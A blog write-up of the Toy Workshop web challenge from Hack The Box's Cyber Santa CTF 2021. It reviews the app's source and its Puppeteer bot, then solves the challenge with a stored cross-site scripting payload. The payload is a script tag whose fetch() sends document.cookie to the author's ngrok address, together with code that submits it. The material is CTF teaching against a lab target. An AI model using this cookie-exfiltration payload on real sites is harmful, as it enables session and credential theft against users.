HTB Cyber Santa CTF 2021: Toy Workshop

HTB Cyber Santa CTF 2021: Toy Workshop


Dec 13, 2021ยท

4 min read


The work is going well on Santa's toy workshop but we lost contact with the manager in charge! We suspect the evil elves have taken over the workshop, can you talk to the worker elves and find out?

This is a complete write-up for the Toy Workshop challenge at Cyber Santa CTF 2021 hosted by Hack The Box. Learn more from additional readings found at the end of the article. I would be thankful if you mention me when using parts of this article in your work. Enjoy!

Basic information

TypeJeopardy CTF / Web
Organized byHack The Box
Name HTB Cyber Santa CTF / Toy Workshop
AuthorAsentinn / OkabeRintaro

๐Ÿ”” CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or ๐ŸŽ become a Patron which also gives you some bonus perks. Join our Discord Server!


We have a downloadable content and docker instance to spin up.

By reading the source code, we can establish the flow of the application. There is a toy_workshop.db database

const db = new Database('toy_workshop.db');

that holds a queries table.


    query       VARCHAR(500) NOT NULL,

The application can interact with that table through following queries:


INSERT INTO queries (query) VALUES (?)

SELECT * FROM queries

The only way we can interact with the database is to insert new query

//routes/index.js'/api/submit', async (req, res) => {

        const { query } = req.body;
            return db.addQuery(query)
                .then(() => {
                    res.send(response('Your message is delivered successfully!'));
        return res.status(403).send(response('Please write your query first!'));

because /queries call can be executed only from the localhost.

router.get('/queries', async (req, res, next) => {
    if(req.ip != '') return res.redirect('/');

    return db.getQueries()
        .then(queries => {
            res.render('queries', { queries });
        .catch(() => res.status(500).send(response('Something went wrong!')));

The /queries endpoint is called by the browser emulator - Puppeteer.

const puppeteer = require('puppeteer');

const browser_options = {
    headless: true,

const cookies = [{
    'name': 'flag',
    'value': 'HTB{f4k3_fl4g_f0r_t3st1ng}'

const readQueries = async (db) => {
        const browser = await puppeteer.launch(browser_options);
        let context = await browser.createIncognitoBrowserContext();
        let page = await context.newPage();
        await page.goto('');
        await page.setCookie(...cookies);
        await page.goto('', {
            waitUntil: 'networkidle2'
        await browser.close();
        await db.migrate();

module.exports = { readQueries };`

When analyzing the bot's readQueries function and the /api/submit endpoint code, we have the clear situation.

  1. Submitting the new query (adding row to queries table) executes the bot.readQueries() function.
  2. Bot opens the web application page:
  3. Bot sets cookie flag=HTB{.*}.
  4. Queries are read by rendering the views/queries.hbs view without any sanitization.
    <div class="dash-frame">
     {{#each queries}}
             <p class="empty">No content</p>

There is a potential SSRF (Server Side Request Forgery) with Sensitive Data Exposure vulnerability.


We should be able to push into the queries table the malicious JS code that would read the flag cookie and sends it back somehow, so we can read the flag. I found this pattern easy to recognize because I was participating in the HTB Cyber Apocalypse CTF this year (2021) and watched some John Hammond video about Alien Journal (see Additional readings).

So, what I did is I set up a simple ngrok tunnel on my machine without listener on my end. I can do that because ngrok provides a nice dashboard under localhost:4040 so I can see the incoming connections.


With that ready, I write an API call to insert the malicious JS into the queries table.

var q = "<script>fetch('http://****-**-***-***-***', {method:'POST', body: document.cookie});</script>";
fetch('/api/submit', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        body: JSON.stringify({query: q}),
    .then((response) => response.json()
        .then((resp) => {
    .catch((error) => {


Additional readings

๐Ÿ“Œ Follow the #CyberEthical hashtag on the social media
๐ŸŽ Become a Patron and gain additional benefits
๐Ÿ‘พ Join CyberEthical Discord server
๐Ÿ‘‰ Instagram:
๐Ÿ‘‰ LinkedIn: CyberEthical.Me
๐Ÿ‘‰ Twitter: @cyberethical_me
๐Ÿ‘‰ Facebook: @CyberEthicalMe

Do you like what you see? Join the now and start publishing. Things that are awesome:
โœ” Automatic GitHub Backup
โœ” Write in Markdown
โœ” Free domain mapping
โœ” CDN hosted images
โœ” Free built-in newsletter service
โœ” Built-in blog monetizing through the Sponsor feature
By using my link, you can help me unlock the ambassador role, which cost you nothing and gives me some additional features to support my content creation mojo.

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!